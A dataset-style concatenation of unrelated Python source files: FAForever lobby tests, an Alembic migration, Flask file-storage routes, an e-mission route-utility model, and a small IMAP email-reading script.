tuna.id: tuna
}
lobbyconnection.player_service.__iter__.side_effect = data.values().__iter__
lobbyconnection.write_warning = mock.Mock()
# This should not leak any exceptions
await lobbyconnection.on_message_received({
"command": "admin",
"action": "broadcast",
"message": "This is a test message"
})
player.lobby_connection.write_warning.assert_called_with("This is a test message")
async def test_broadcast_connection_error(lobbyconnection: LobbyConnection, player_factory):
player = lobbyconnection.player
player.lobby_connection = lobbyconnection
player.id = 1
tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
tuna.lobby_connection.write_warning.side_effect = DisconnectedError("Some error")
data = {
player.id: player,
tuna.id: tuna
}
lobbyconnection.player_service.__iter__.side_effect = data.values().__iter__
lobbyconnection.write_warning = mock.Mock()
# This should not leak any exceptions
await lobbyconnection.on_message_received({
"command": "admin",
"action": "broadcast",
"message": "This is a test message"
})
player.lobby_connection.write_warning.assert_called_with("This is a test message")
async def test_game_connection_not_restored_if_no_such_game_exists(lobbyconnection: LobbyConnection, mocker):
del lobbyconnection.player.game_connection
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.player.state = PlayerState.IDLE
await lobbyconnection.on_message_received({
"command": "restore_game_session",
"game_id": 123
})
assert not lobbyconnection.player.game_connection
assert lobbyconnection.player.state == PlayerState.IDLE
lobbyconnection.send.assert_any_call({
"command": "notice",
"style": "info",
"text": "The game you were connected to does no longer exist"
})
@pytest.mark.parametrize("game_state", [GameState.INITIALIZING, GameState.ENDED])
async def test_game_connection_not_restored_if_game_state_prohibits(
lobbyconnection: LobbyConnection,
game_service: GameService,
game_stats_service,
game_state,
mocker,
database
):
del lobbyconnection.player.game_connection
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.player.state = PlayerState.IDLE
lobbyconnection.game_service = game_service
game = mock.create_autospec(Game(42, database, game_service, game_stats_service))
game.state = game_state
game.password = None
game.game_mode = "faf"
game.id = 42
game_service._games[42] = game
await lobbyconnection.on_message_received({
"command": "restore_game_session",
"game_id": 42
})
assert not lobbyconnection.game_connection
assert lobbyconnection.player.state == PlayerState.IDLE
lobbyconnection.send.assert_any_call({
"command": "notice",
"style": "info",
"text": "The game you were connected to is no longer available"
})
@pytest.mark.parametrize("game_state", [GameState.LIVE, GameState.LOBBY])
async def test_game_connection_restored_if_game_exists(
lobbyconnection: LobbyConnection,
game_service: GameService,
game_stats_service,
game_state,
database
):
del lobbyconnection.player.game_connection
lobbyconnection.player.state = PlayerState.IDLE
lobbyconnection.game_service = game_service
game = mock.create_autospec(Game(42, database, game_service, game_stats_service))
game.state = game_state
game.password = None
game.game_mode = "faf"
game.id = 42
game_service._games[42] = game
await lobbyconnection.on_message_received({
"command": "restore_game_session",
"game_id": 42
})
assert lobbyconnection.game_connection
assert lobbyconnection.player.state is PlayerState.PLAYING
assert lobbyconnection.player.game is game
async def test_command_invite_to_party(lobbyconnection, mock_player):
lobbyconnection.player = mock_player
lobbyconnection.player.id = 2
lobbyconnection._authenticated = True
await lobbyconnection.on_message_received({
"command": "invite_to_party",
"recipient_id": 1
})
lobbyconnection.party_service.invite_player_to_party.assert_called_once()
async def test_command_accept_party_invite(lobbyconnection, mock_player):
lobbyconnection.player = mock_player
lobbyconnection.player.id = 2
lobbyconnection._authenticated = True
await lobbyconnection.on_message_received({
"command": "accept_party_invite",
"sender_id": 1
})
lobbyconnection.party_service.accept_invite.assert_called_once()
async def test_command_kick_player_from_party(lobbyconnection, mock_player):
lobbyconnection.player = mock_player
lobbyconnection.player.id = 2
lobbyconnection._authenticated = True
await lobbyconnection.on_message_received({
"command": "kick_player_from_party",
"kicked_player_id": 1
})
lobbyconnection.party_service.kick_player_from_party.assert_called_once()
async def test_command_leave_party(lobbyconnection, mock_player):
lobbyconnection.player = mock_player
lobbyconnection.player.id = 2
lobbyconnection._authenticated = True
await lobbyconnection.on_message_received({
"command": "leave_party"
})
lobbyconnection.party_service.leave_party.assert_called_once()
async def test_command_game_matchmaking(lobbyconnection):
lobbyconnection.player.id = 1
await lobbyconnection.on_message_received({
"command": "game_matchmaking",
"state": "stop"
})
lobbyconnection.ladder_service.cancel_search.assert_called_with(
lobbyconnection.player,
"ladder1v1"
)
async def test_command_game_matchmaking_not_party_owner(
lobbyconnection,
mock_player,
player_factory
):
party_owner = player_factory(player_id=2, lobby_connection_spec="auto")
party = PlayerParty(party_owner)
party.add_player(mock_player)
lobbyconnection.player.id = 1
lobbyconnection.party_service.get_party.return_value = party
await lobbyconnection.on_message_received({
"command": "game_matchmaking",
"state": "start",
"faction": "seraphim"
})
lobbyconnection.ladder_service.start_search.assert_not_called()
await lobbyconnection.on_message_received({
"command": "game_matchmaking",
"state": "stop"
})
lobbyconnection.ladder_service.cancel_search.assert_called_once()
async def test_command_match_ready(lobbyconnection):
await lobbyconnection.on_message_received({
"command": "match_ready"
})
async def test_command_matchmaker_info(
lobbyconnection,
ladder_service,
queue_factory,
player_factory,
mocker
):
queue = queue_factory("test", rating_type=RatingType.LADDER_1V1)
queue.timer.next_queue_pop = 1_562_000_000
queue.push(Search([
player_factory(player_id=1, ladder_rating=(2000, 100), ladder_games=200),
]))
queue.push(Search([
player_factory(player_id=2, ladder_rating=(500, 120), ladder_games=100),
player_factory(player_id=3, ladder_rating=(1500, 500), ladder_games=0),
]))
queue.push(Search([
player_factory(player_id=4, ladder_rating=(1000, 100), ladder_games=500),
player_factory(player_id=5, ladder_rating=(1300, 100), ladder_games=200),
player_factory(player_id=6, ladder_rating=(2000, 100), ladder_games=1000),
]))
mocker.patch(
"server.matchmaker.matchmaker_queue.time.time",
return_value=queue.timer.next_queue_pop - 1,
)
lobbyconnection.ladder_service.queues = {
"test": queue
}
lobbyconnection.send = mock.AsyncMock()
await lobbyconnection.on_message_received({
"command": "matchmaker_info"
})
lobbyconnection.send.assert_called_with({
"command": "matchmaker_info",
"queues": [
{
"queue_name": "test",
"queue_pop_time": "2019-07-01T16:53:20+00:00",
"queue_pop_time_delta": 1.0,
"team_size": 1,
"num_players": 6,
"boundary_80s": [(1800, 2200), (300, 700), (800, 1200)],
"boundary_75s": [(1900, 2100), (400, 600), (900, 1100)]
}
]
})
async def test_connection_lost(lobbyconnection):
lobbyconnection.game_connection = mock.create_autospec(GameConnection)
await lobbyconnection.on_connection_lost()
lobbyconnection.game_connection.on_connection_lost.assert_called_once()
async def test_connection_lost_send(lobbyconnection, mock_protocol):
await lobbyconnection.on_connection_lost()
await lobbyconnection.send({"command": "Some Message"})
mock_protocol.send_message.assert_not_called()
mock_protocol.send_messages.assert_not_called()
mock_protocol.send_raw.assert_not_called()
async def test_check_policy_conformity(lobbyconnection, policy_server):
host, port = policy_server
config.FAF_POLICY_SERVER_BASE_URL = f"http://{host}:{port}"
honest = await lobbyconnection.check_policy_conformity(1, "honest", session=100)
assert honest is True
async def test_check_policy_conformity_fraudulent(lobbyconnection, policy_server, database):
host, port = policy_server
config.FAF_POLICY_SERVER_BASE_URL = f"http://{host}:{port}"
# 42 is not a valid player ID which should cause a SQL constraint error
lobbyconnection.abort = mock.AsyncMock()
with pytest.raises(ClientError):
await lobbyconnection.check_policy_conformity(42, "fraudulent", session=100)
lobbyconnection.abort = mock.AsyncMock()
player_id = 200
honest = await lobbyconnection.check_policy_conformity(player_id, "fraudulent", session=100)
assert honest is False
lobbyconnection.abort.assert_called_once()
# Check that the user has a ban entry in the database
async with database.acquire() as conn:
result = await conn.execute(select(ban.c.reason).where(
ban.c.player_id == player_id
))
rows = result.fetchall()
assert rows is not None
assert rows[-1].reason == "Auto-banned because of fraudulent login attempt"
async def test_check_policy_conformity_fatal(lobbyconnection, policy_server):
host, port = policy_server
config.FAF_POLICY_SERVER_BASE_URL = f"http://{host}:{port}"
for result in ("already_associated", "fraudulent"):
lobbyconnection.abort = mock.AsyncMock()
honest = await lobbyconnection.check_policy_conformity(1, result, session=100)
assert honest is False
lobbyconnection.abort.assert_called_once()
async def test_abort_connection_if_banned(
lobbyconnection: LobbyConnection,
mock_nts_client
):
# test user that has never been banned
lobbyconnection.player.id = 1
await lobbyconnection.abort_connection_if_banned()
# test user whose ban has been revoked
lobbyconnection.player.id = 201
await lobbyconnection.abort_connection_if_banned()
# test user whose ban has expired
lobbyconnection.player.id = 202
await lobbyconnection.abort_connection_if_banned()
# test user who is permabanned
lobbyconnection.player.id = 203
with pytest.raises(BanError) as banned_error:
await lobbyconnection.abort_connection_if_banned()
assert banned_error.value.message() == \
"You are banned from FAF forever. <br>Reason: <br>Test permanent ban"
# test user who is banned for another 46 hours
lobbyconnection.player.id = 204
with pytest.raises(BanError) as banned_error:
await lobbyconnection.abort_connection_if_banned()
assert re.match(
r"You are banned from FAF for 1 day and 2[12]\.[0-9]+ hours. <br>"
"Reason: <br>Test ongoing ban with 46 hours left",
banned_error.value.message()
)
| FAForever/server | tests/unit_tests/test_lobbyconnection.py | test_lobbyconnection.py | py | 34,970 | python | en | code | 64 | github-code | 36 |
36117885682 | """
Revision ID: a93cd7e01a93
Revises: 6052d96d32f0
Create Date: 2020-06-28 16:58:12.857105
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a93cd7e01a93'
down_revision = '6052d96d32f0'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('group_menu',
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('group_id', sa.Integer(), nullable=True),
sa.Column('group_key', sa.String(length=32), nullable=True),
sa.Column('menu_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['group_id'], ['group.id'], ),
sa.ForeignKeyConstraint(['menu_id'], ['menu.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_group_menu_id'), 'group_menu', ['id'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_group_menu_id'), table_name='group_menu')
op.drop_table('group_menu')
# ### end Alembic commands ###
| lianjy357/vue-element-admin-fastapi | backend/app/alembic/versions/a93cd7e01a93_.py | a93cd7e01a93_.py | py | 1,142 | python | en | code | 14 | github-code | 36 |
11939197341 | from flask import (
Blueprint,
flash,
redirect,
url_for,
render_template,
request,
send_from_directory,
)
from filenavi import model
from .wrap import require_authentication
from .error import MalformedRequest, Unauthorized, NotAuthenticated, NotAccessible
INLINE_EXTENSIONS = ["txt", "pdf", "png", "jpg", "jpeg", "gif"]
bp = Blueprint("storage", __name__)
@bp.route("/<user:owner>/<visibility:visibility>/browse/")
@bp.route("/<user:owner>/<visibility:visibility>/browse/<path:path>")
def browse(owner, visibility, path=None):
user = model.User.current()
home = owner.home(visibility)
path = (home / path) if path is not None else home
target = model.File(path, owner, visibility)
if visibility == model.Visibility.PRIVATE:
if user is None:
raise NotAuthenticated
if not user.has_access_to(target):
raise Unauthorized
if not path.is_dir():
as_attachment = True
if any(str(target.path).lower().endswith(f".{e}") for e in INLINE_EXTENSIONS):
as_attachment = False
return send_from_directory(
home, target.path.relative_to(home), as_attachment=as_attachment
)
if user is None or not user.has_access_to(target):
raise Unauthorized
if not request.path.endswith("/"):
return redirect(f"{request.url}/")
files = []
try:
for f in path.iterdir():
f = f.relative_to(home)
files.append(model.File(f, owner, visibility))
except:
raise NotAccessible
parent = None
if not home.samefile(path):
parent = model.File(path.parent, owner, visibility)
return render_template(
"storage/browse.html",
files=files,
user=user,
owner=owner,
visibility=visibility,
current=path.relative_to(home) if path != home else "",
parent=parent,
)
@bp.route("/<user:owner>/<visibility:visibility>/browse/", methods=["POST"])
@bp.route(
"/<user:owner>/<visibility:visibility>/browse/<path:path>", methods=["POST"]
)
@require_authentication
def browse_handler(owner, visibility, path=None):
user = model.User.current()
if "files" not in request.files and "directory" not in request.form:
raise MalformedRequest
home = owner.home(visibility)
path = (home / path) if path is not None else home
target = model.File(path, owner, visibility)
if not user.has_access_to(target):
raise Unauthorized
if "files" in request.files:
uploads = request.files.getlist("files")
for upload in uploads:
if upload.filename == "":
raise MalformedRequest
upload.save(path / upload.filename)
if "directory" in request.form:
if request.form["directory"] == "":
raise MalformedRequest
directory = model.File(path / request.form["directory"], owner, visibility)
directory.mkdir()
return redirect(
url_for(
".browse", visibility=visibility, path=path.relative_to(home), owner=owner
)
)
@bp.route("/<user:owner>/<visibility:visibility>/move/<path:path>")
@require_authentication
def move(owner, visibility, path=None):
user = model.User.current()
home = owner.home(visibility)
path = (home / path) if path is not None else home
target = model.File(path, owner, visibility)
if not user.has_access_to(target):
raise Unauthorized
return render_template(
"storage/move.html",
file=target,
user=user,
owner=owner,
visibility=visibility,
)
@bp.route(
"/<user:owner>/<visibility:visibility>/move/<path:path>",
methods=["POST"],
)
@require_authentication
def move_handler(owner, visibility, path=None):
user = model.User.current()
home = owner.home(visibility)
path = (home / path) if path is not None else home
target = model.File(home / path, owner, visibility)
if not user.has_access_to(target):
raise Unauthorized
rv = redirect(
url_for(
".browse",
visibility=visibility,
path=path.relative_to(home).parents[0],
owner=owner,
)
)
if "path" not in request.form:
raise MalformedRequest
if not target.path.exists():
flash("No such file or directory", "error")
return rv
try:
force = "replace" in request.form
target.move(home / request.form["move-path"], force=force)
except ValueError:
flash("Unable to move file", "error")
return rv
return rv
@bp.route("/<user:owner>/<visibility:visibility>/toggle/<path:path>")
@require_authentication
def toggle(owner, visibility, path=None):
user = model.User.current()
home = owner.home(visibility)
path = (home / path) if path is not None else home
target = model.File(path, owner, visibility)
if not user.has_access_to(target):
raise Unauthorized
return render_template(
"storage/toggle.html",
file=target,
user=user,
owner=owner,
visibility=visibility,
)
@bp.route(
"/<user:owner>/<visibility:visibility>/toggle/<path:path>",
methods=["POST"],
)
@require_authentication
def toggle_handler(owner, visibility, path=None):
user = model.User.current()
home = owner.home(visibility)
path = (home / path) if path is not None else home
target = model.File(home / path, owner, visibility)
if not user.has_access_to(target):
raise Unauthorized
rv = redirect(
url_for(
".browse",
visibility=visibility,
path=path.relative_to(home).parents[0],
owner=owner,
)
)
if "path" not in request.form:
raise MalformedRequest
try:
force = "replace" in request.form
# TODO: Do not require a Path object
from pathlib import Path
target.toggle(Path(request.form["path"]), force=force)
except ValueError:
flash("Cannot toggle visibility", "error")
return rv
return rv
@bp.route("/<user:owner>/<visibility:visibility>/remove/<path:path>")
@require_authentication
def remove(owner, visibility, path=None):
user = model.User.current()
home = owner.home(visibility)
path = (home / path) if path is not None else home
target = model.File(path, owner, visibility)
if not user.has_access_to(target):
raise Unauthorized
return render_template(
"storage/remove.html",
file=target,
user=user,
owner=owner,
visibility=visibility,
)
@bp.route(
"/<user:owner>/<visibility:visibility>/remove/<path:path>",
methods=["POST"],
)
@require_authentication
def remove_handler(owner, visibility, path=None):
user = model.User.current()
home = owner.home(visibility)
path = (home / path) if path is not None else home
target = model.File(home / path, owner, visibility)
if not user.has_access_to(target):
raise Unauthorized
rv = redirect(
url_for(
".browse",
visibility=visibility,
path=path.relative_to(home).parents[0],
owner=owner,
)
)
recursive = "recursive" in request.form
try:
target.remove(recursive=recursive)
except ValueError:
flash("No such file or directory", "error")
return rv
except OSError:
flash("Cannot remove file or directory", "error")
return rv
return rv
| lukaswrz/filenavi | filenavi/routing/storage.py | storage.py | py | 7,605 | python | en | code | 0 | github-code | 36 |
15826968262 | from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from builtins import *
from past.utils import old_div
from builtins import object
import pykov as pk
import emission.net.ext_service.otp.otp as otp
import emission.net.ext_service.geocoder.nominatim as geo
import emission.core.wrapper.trip_old as to
import emission.core.get_database as edb
import datetime
import random
import math
import urllib.request, urllib.error, urllib.parse
import json
import heapq
import time
import requests
import random
import os
CENTER_OF_CAMPUS = to.Coordinate(37.871790, -122.260005)
RANDOM_RADIUS = .3 # 300 meters around center of campus; for randomization
N_TOP_TRIPS = 3 # Number of top trips we return for the user to look at
class UserBase(object):
"""
Stores all the users and stores the population of areas
Also keeps state on other useful things that we need to know, like caches
"""
def __init__(self):
self.users = []
self.crowd_areas = {}
self.last_info = {} ## so we only call google maps if we change things
self.old_trips = None
self.geocode_cache = {} # fewer calls to google maps
def add_user(self, user):
self.users.append(user)
def add_crowd(self, area):
self.crowd_areas[area.name] = area
def get_crowd_info(self, area_name):
return self.crowd_areas[area_name]
def geocode_with_cache(self, place):
coder = geo.Geocoder()
if place in self.geocode_cache:
print(self.geocode_cache[place])
return self.geocode_cache[place]
else:
coded = coder.geocode(place)
self.geocode_cache[place] = coded
print(coded)
return coded
the_base = UserBase()
class CampusTrip(object):
def __init__(self, score_list, time_duration, points, source):
self.time = score_list[0]
self.sweat = score_list[1]
self.beauty = score_list[2]
self.social = score_list[3]
self.tot_score = sum(score_list)
self.time_duration = old_div(time_duration, float(60))
self.points = points
self.source = source
def make_points(self):
to_return = ""
for p in self.points:
to_return += str(p[0])
to_return += ","
to_return += str(p[1])
to_return += ","
return to_return
def make_for_browser(self):
return '%s;%s;%s;%s;%s;%s' % (self.beauty, self.time, self.social, self.sweat, self.time_duration, self.make_points())
def make_jsn(self):
return json.dumps({"time" : self.time, "beauty" : self.beauty, "social" : self.social, "sweat" : self.sweat, "duration" : self.time_duration, "points" : self.points})
def make_json(self):
return json.dumps(self.make_for_browser())
def __repr__(self):
return "total score : %f || source : %s || beauty : %f || sweat : %f || time : %f || social : %f" % (self.tot_score, self.source, self.beauty, self.sweat, self.time, self.social)
def __eq__(self, other):
return self.make_points() == other.make_points()
class UserModel(object):
"""
User Model class
Can do lots of cool things
"""
def __init__(self, has_bike=False):
self.utilities = pk.Chain()
self.has_bike = has_bike
self.user_base = the_base
self.user_base.add_user(self)
## Initialize utilities
self.utilities["sweat"] = 0
self.utilities["scenery"] = 0
self.utilities["social"] = 0
self.utilities["time"] = 0
def get_top_choice_places(self, start_place, end_place):
start = self.user_base.geocode_with_cache(start_place)
end = self.user_base.geocode_with_cache(end_place)
return self.get_top_choices_lat_lng(start, end)
def get_all_trips(self, start, end, curr_time=None):
if curr_time is None:
curr_time = datetime.datetime.now()
curr_month = curr_time.month
curr_year = curr_time.year
curr_minute = curr_time.minute
curr_day = curr_time.day
curr_hour = curr_time.hour
mode = "WALK"
if self.has_bike:
mode = "BICYCLE"
walk_otp = otp.OTP(os.environ("OTP_SERVER")).route(start, end, "WALK", write_day(curr_month, curr_day, curr_year), write_time(curr_hour, curr_minute), False)
lst_of_trips = walk_otp.get_all_trips(0, 0, 0)
tot_trips = lst_of_trips
return tot_trips
def get_top_choices_lat_lng(self, start, end, curr_time=None, tot_trips=None):
testing = True
if tot_trips is None:
tot_trips = self.get_all_trips(start, end, curr_time)
testing = False
scores = [ ]
times = get_normalized_times(tot_trips)
beauty = get_normalized_beauty(tot_trips)
sweat = get_normalized_sweat(tot_trips, testing=testing)
for i in range(len(times)):
scores.append(self.get_score_for_trip(tot_trips[i], times[i], beauty[i], sweat[i]))
top = self.get_top_n(scores, N_TOP_TRIPS)
return top
def get_score_for_trip(self, trip, time, beauty, sweat):
crowd_score = 0
lst_of_points = get_route(trip)
for crowd in self.user_base.crowd_areas.values():
crowd.update_times(trip.start_time)
crowd_score += crowd.get_crowd()
final_time = -(time * self.utilities["time"])
final_sweat = -sweat * self.utilities["sweat"]
final_beauty = (self.utilities['scenery']*beauty)
final_crowd = (self.utilities['social']*crowd_score)
final_score_tuple = (final_time, final_sweat, final_beauty, final_crowd)
print("final_score_tuple : %s" % str(final_score_tuple))
return CampusTrip(final_score_tuple, get_time_of_trip(trip), lst_of_points, "source")
def get_top_n(self, lst_of_trips, n):
return heapq.nlargest(n, lst_of_trips, key=lambda v: v.tot_score)
def increment_utility(self, which):
self.utilities[which] += 1
def increase_utility_by_n(self, which, n):
self.utilities[which] += n
def normalize_utilities(self):
self.utilities.normalize()
def save_to_db(self):
db = edb.get_utility_model_db()
db.insert({"utilities" : self.utilities, "name" : self.name})
def delta(self, start, end):
"""
Returns true if anything has changed and we should call google maps...
Otherwise no.
"""
if "start" not in self.user_base.last_info or "end" not in self.user_base.last_info or "utilities" not in self.user_base.last_info:
#print "first delta"
return True
return not (start == self.user_base.last_info["start"] and end == self.user_base.last_info["end"] and self.utilities == self.user_base.last_info["utilities"])
def add_to_last(self, start, end):
self.user_base.last_info["utilities"] = self.utilities.copy()
self.user_base.last_info["start"] = start
self.user_base.last_info["end"] = end
def normalize_noises(noise_areas):
to_return = []
for area in noise_areas:
area.normalize_sounds()
to_return.append(area)
return to_return
def get_time_of_trip(trip):
return (trip.end_time - trip.start_time).seconds
def get_normalized_times(lst_of_trips):
counter = pk.Vector()
i = 0
for trip in lst_of_trips:
counter[i] = get_time_of_trip(trip)
i += 1
counter.normalize()
to_return = []
for i in range(len(lst_of_trips)):
to_return.append(counter[i])
return to_return
def get_sweat_factor(trip, testing=False):
chng = get_elevation_change(trip, testing)
print("chng : %s" % str(chng))
return 71.112*chng[0] + 148.09
def get_normalized_sweat(lst_of_trips, testing=False):
counter = pk.Vector()
i = 0
for trip in lst_of_trips:
factor = get_sweat_factor(trip, testing)
print("sweat_factor : %s" % factor)
counter[i] = factor
i += 1
counter.normalize()
to_return = []
for i in range(len(lst_of_trips)):
to_return.append(counter[i])
return to_return
def get_normalized_beauty(lst_of_trips):
counter = pk.Vector()
i = 0
for trip in lst_of_trips:
factor = get_beauty_score_of_trip(trip)
print("beauty_factor : %s" % factor)
counter[i] = factor
i += 1
counter.normalize()
to_return = []
for i in range(len(lst_of_trips)):
to_return.append(counter[i])
return to_return
class Area(object):
""" Area class """
def __init__(self, name, tl, br, beauty=None, time_to_noise=None):
self.name = name
self.bounding_box = (tl, br)
self.beauty = beauty
self.time_to_noise = time_to_noise
self.times = set()
def point_in_area(self, lat, lng):
return in_bounding_box(lat, lng, self.bounding_box)
def add_time(self, time):
self.times.add(time)
def get_crowd(self):
return len(self.times)
def update_times(self, time_by):
for time in self.times:
if time < time_by:
self.times.remove(time)
def update_to_now(self):
self.update_times(datetime.datetime.now())
def normalize_sounds(self):
counter = pk.Vector()
for k,v in self.time_to_noise.items():
counter[k] = v
counter.normalize()
self.time_to_noise = counter
def __repr__(self):
return "beauty : %s" % (self.beauty)
def in_bounding_box(lat, lon, bounding_box):
return bounding_box[1][0] <= lat and lat <= bounding_box[0][0] and bounding_box[0][1] <= lon and lon <= bounding_box[1][1]
def parse_noise():
noise_file = open("emission/user_model_josh/noise_data.csv")
sproul_noises, glade_noises, wellmen_noises, leconte_noises = {}, {}, {}, {}
sproul_tl, sproul_br = (37.870637,-122.259722), (37.868926,-122.259005)
glade_tl, glade_br = (37.87359,-122.260098), (37.872707,-122.258687)
wellmen_tl, wellmen_br = (37.873045,-122.263377), (37.872501,-122.261803)
lecont_tl, lecont_br = (37.873278,-122.256959), (37.872277,-122.25639)
time = datetime.datetime(2040, 10, 10, 6, 0, 0)
td = datetime.timedelta(minutes=10)
for l in noise_file:
l = l.split(',')
sproul_noises[time] = float(l[0])
glade_noises[time] = float(l[1])
wellmen_noises[time] = float(l[2])
leconte_noises[time] = float(l[3])
sproul = Area("sproul", sproul_tl, sproul_br, time_to_noise=sproul_noises)
glade = Area("glade", glade_tl, glade_br, time_to_noise=glade_noises)
wellmen = Area("wellmen", wellmen_tl, wellmen_br, time_to_noise=wellmen_noises)
leconte = Area("leconte", lecont_tl, lecont_br, time_to_noise=leconte_noises)
return [sproul, glade, wellmen, leconte]
def parse_beauty():
beauty_file = open("emission/user_model_josh/beauty.csv")
beauty_areas = [ ]
for beauty_line in beauty_file:
beauty_line = beauty_line.split(',')
name = beauty_line[0]
tl = (float(beauty_line[1]), float(beauty_line[2]))
br = (float(beauty_line[5]), float(beauty_line[6]))
beauty = int(beauty_line[9])
a = Area(name, tl, br, beauty=beauty)
beauty_areas.append(a)
return beauty_areas
def get_noise_score(lat, lng, noises, time):
tot = 0
to_return = 0
for noise_area in noises:
if noise_area.point_in_area(lat, lng):
to_return += get_closest(time, noise_area)
if to_return > 0:
return to_return
return .5 ## if point isnt in any mapped area return the average
def get_closest(time, area):
for k, v in area.time_to_noise.items():
if time - k < datetime.timedelta(minutes=10):
return v
return 0
def get_beauty_score(lat, lng, beauties):
tot = 0
for beauty_area in beauties:
tot += beauty_area.beauty
if beauty_area.point_in_area(lat, lng):
return beauty_area.beauty
return old_div(float(tot), float(len(beauties))) ## if point isnt in any mapped area return the average
def get_beauty_score_of_trip(trip):
beauties = parse_beauty()
beauty_score = 0
tot_points = 0
for section in trip.sections:
for point in section.points:
tot_points += 1
beauty_score += get_beauty_score(point.get_lat(), point.get_lon(), beauties)
return old_div(float(beauty_score), float(tot_points))
def get_noise_score_of_trip(trip):
noises = parse_noise()
noise_score = 0
for section in trip.sections:
for point in section.points:
tot_points += 1
noise_score += get_noise_score(point.get_lat(), point.get_lon(), noises)
return old_div(float(beauty_score), float(tot_points))
def get_route_dict(trip):
route = []
for point in trip:
d = {'lat' : point[0], 'lng' : point[1]}
route.append(d)
return route
def get_route(trip):
i = 0
lst_of_points = []
lst_of_points.append( (trip.trip_start_location.get_lat(), trip.trip_start_location.get_lon()) )
for section in trip.sections:
for point in section.points:
if i % 2 == 0:
lst_of_points.append( (point.get_lat(), point.get_lon()) )
i += 1
lst_of_points.append( (trip.trip_end_location.get_lat(), trip.trip_end_location.get_lon()) )
return lst_of_points
def write_day(month, day, year):
return "%s-%s-%s" % (month, day, year)
def write_time(hour, minute):
return "%s:%s" % (hour, minute)
def get_one_random_point_in_radius(crd, radius):
# From https://gis.stackexchange.com/questions/25877/how-to-generate-random-locations-nearby-my-location
radius_in_degrees = kilometers_to_degrees(radius)
x_0 = crd.get_lon()
y_0 = crd.get_lat()
u = random.random()
v = random.random()
w = radius_in_degrees * math.sqrt(u)
t = 2 * math.pi * v
x = w * math.cos(t)
y = w * math.sin(t)
x = old_div(float(x), float(math.cos(y_0))) # To account for Earth curvature stuff
to_return = to.Coordinate(y + y_0, x + x_0)
return to_return
def kilometers_to_degrees(km):
## From stackexchnage mentioned above
return (old_div(float(km),float(40000))) * 360
def str_time_to_datetme(str_time):
t = str_time.split(":")
return datetime.datetime(2040, 10, 10, int(t[0]), int(t[1]), 0)
def make_user_from_jsn(jsn, base):
value_line = jsn["objects"]["Computer"]["streams"]["userData"]["points"][0]["value"]
value_line = value_line.split(";")
start = value_line[0]
end = value_line[1]
start = base.geocode_with_cache(start)
end = base.geocode_with_cache(end)
time_info = {}
print(value_line)
if value_line[2] == "leaveNow":
time_info["leave"] = True
time_info["when"] = datetime.datetime.now()
print("leaveNow")
elif value_line[2] == "leaveAt":
time_info["leave"] = True
time_info["when"] = str_time_to_datetme(value_line[3])
print("leaveAt")
elif value_line[2] == "thereBy":
time_info["leave"] = False
time_info["when"] = str_time_to_datetme(value_line[3])
print("arriveAt")
bike = get_bike_info(value_line[4])
user = UserModel(bike)
user.increase_utility_by_n("time", int(value_line[5]))
user.increase_utility_by_n("sweat", int(value_line[6]))
user.increase_utility_by_n("scenery", int(value_line[7]))
user.increase_utility_by_n("social", int(value_line[8]))
user.utilities.normalize()
print("utilities : %s" % user.utilities)
return {"user" : user, "start" : start, "end" : end, "time_info" : time_info}
def get_bike_info(bike_str):
if bike_str == "walk":
return False
return True
def get_elevation_change(trip, testing=False):
# TODO: re-implement using the open elevation API
pass
if __name__ == "__main__":
main()
| e-mission/e-mission-server | emission/analysis/modelling/user_model_josh/utility_model.py | utility_model.py | py | 16,233 | python | en | code | 22 | github-code | 36 |
12835968022 | import time
from itertools import chain
import email
import imaplib
import smtplib
from readair import Log
MY_NAME="Nile Walker"
MY_ADDRESS = 'nilezwalker@gmail.com'
PASSWORD = input('Enter the password for {}\n'.format(MY_ADDRESS))
MY_NUMBER='410-805-0012'
SUBJECT="Google Housing Request"
SERVER_ADDRESS="smtp.gmail.com"
PORT=587
# Restrict mail search. Be very specific.
# Machine should be very selective to receive messages.
criteria = {
'FROM': 'yahoo@antonakis.co.uk',
#S'SUBJECT': 'SPECIAL SUBJECT LINE',
#'BODY': 'SECRET SIGNATURE',
}
uid_max = 0
def getBody(b):
body = ""
if b.is_multipart():
for part in b.walk():
ctype = part.get_content_type()
cdispo = str(part.get('Content-Disposition'))
# skip any text/plain (txt) attachments
if ctype == 'text/plain' and 'attachment' not in cdispo:
body = part.get_payload(decode=True) # decode
break
# not multipart - i.e. plain text, no attachments, keeping fingers crossed
else:
body = b.get_payload(decode=True)
return body
def get_first_text_block(msg):
type = msg.get_content_maintype()
if type == 'multipart':
for part in msg.get_payload():
if part.get_content_maintype() == 'text':
return part.get_payload()
elif type == 'text':
return msg.get_payload()
mail = imaplib.IMAP4_SSL(SERVER_ADDRESS)
mail.login(MY_ADDRESS,PASSWORD)
mail.select('INBOX')
typ, data = mail.search(None, '(FROM "yahoo@antonakis.co.uk")')
mail_ids = data[0]
id_list = mail_ids.split()
for email_id in id_list:
result, data = mail.fetch(email_id, "(RFC822)") # fetch the email body (RFC822) for the given ID
msg=email.message_from_bytes(data[0][1])
body = getBody(msg)
body = body.decode("utf-8")
body = "".join(body.split('\r'))
Log(body)
mail.logout()
"""
# Keep checking messages ...
# I don't like using IDLE because Yahoo does not support it.
while 1:
# Have to login/logout each time because that's the only way to get fresh results.
server = imaplib.IMAP4_SSL(SERVER_ADDRESS)
server.login(MY_ADDRESS,PASSWORD)
server.select('INBOX')
result, data = server.uid('search', None, search_string(uid_max, criteria))
uids = [int(s) for s in data[0].split()]
for uid in uids:
# Have to check again because Gmail sometimes does not obey UID criterion.
if uid > uid_max:
result, data = server.uid('fetch', uid, '(RFC822)') # fetch entire message
msg = email.message_from_string(data[0][1])
uid_max = uid
text = get_first_text_block(msg)
print('New message :::::::::::::::::::::')
print(text)
server.logout()
time.sleep(5*60)"""
